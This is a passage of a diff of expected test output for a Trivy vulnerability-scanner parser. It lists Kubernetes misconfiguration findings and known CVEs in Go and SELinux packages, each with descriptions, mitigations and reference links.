Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27191", + "installedVersion": "v0.0.0-20220131195533-30dcbda58838", + "packageName": "golang.org/x/crypto", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8008", + "https://access.redhat.com/security/cve/CVE-2022-27191", + "https://bugzilla.redhat.com/1939485", + "https://bugzilla.redhat.com/1989564", + "https://bugzilla.redhat.com/1989570", + "https://bugzilla.redhat.com/1989575", + "https://bugzilla.redhat.com/2064702", + "https://bugzilla.redhat.com/2121445", + "https://bugzilla.redhat.com/2121453", + "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "https://go.dev/cl/392355", + "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "https://linux.oracle.com/cve/CVE-2022-27191.html", + "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "https://pkg.go.dev/vuln/GO-2021-0356", + "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "https://security.netapp.com/advisory/ntap-20220429-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-27191", + ], + }, + "category": "Vulnerability", + "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "crash in a golang.org/x/crypto/ssh server", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-27191", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://access.redhat.com/errata/RHSA-2022:8008", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://access.redhat.com/security/cve/CVE-2022-27191", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "value": "https://bugzilla.redhat.com/1939485", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://bugzilla.redhat.com/1989564", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "value": "https://bugzilla.redhat.com/1989570", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36085", - "installedVersion": "2.8-1", - "packageName": "libsepol1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36085", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", - "https://linux.oracle.com/cve/CVE-2021-36085.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36085", - ], - }, - "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36085", + "value": "https://bugzilla.redhat.com/1989575", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36085", + "value": "https://bugzilla.redhat.com/2064702", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "value": "https://bugzilla.redhat.com/2121445", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://bugzilla.redhat.com/2121453", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://go.dev/cl/392355", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2021-0356", + }, + { + "type": "URL", + "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36086", - "installedVersion": "2.8-1", - "packageName": "libsepol1", + "fixedVersion": "0.0.0-20211209124913-491a49abca63", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-44716", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36086", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", - "https://linux.oracle.com/cve/CVE-2021-36086.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "https://access.redhat.com/security/cve/CVE-2021-44716", + "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "https://github.com/golang/go/issues/50058", + "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "https://go.dev/cl/369794", + "https://go.dev/issue/50058", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "https://linux.oracle.com/cve/CVE-2021-44716.html", + "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "https://pkg.go.dev/vuln/GO-2022-0288", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220121-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-44716", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "use-after-free in cil_reset_classpermission()", + "name": "golang: net/http: limit growth of header canonicalization cache", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36086", + "value": "https://avd.aquasec.com/nvd/cve-2021-44716", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36086", + "value": "https://access.redhat.com/security/cve/CVE-2021-44716", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://github.com/golang/go/issues/50058", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://go.dev/cl/369794", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://go.dev/issue/50058", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "value": "https://pkg.go.dev/vuln/GO-2022-0288", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36087", - "installedVersion": "2.8-1", - "packageName": "libsepol1", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36087", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", - "https://linux.oracle.com/cve/CVE-2021-36087.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36087", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36087", + "value": 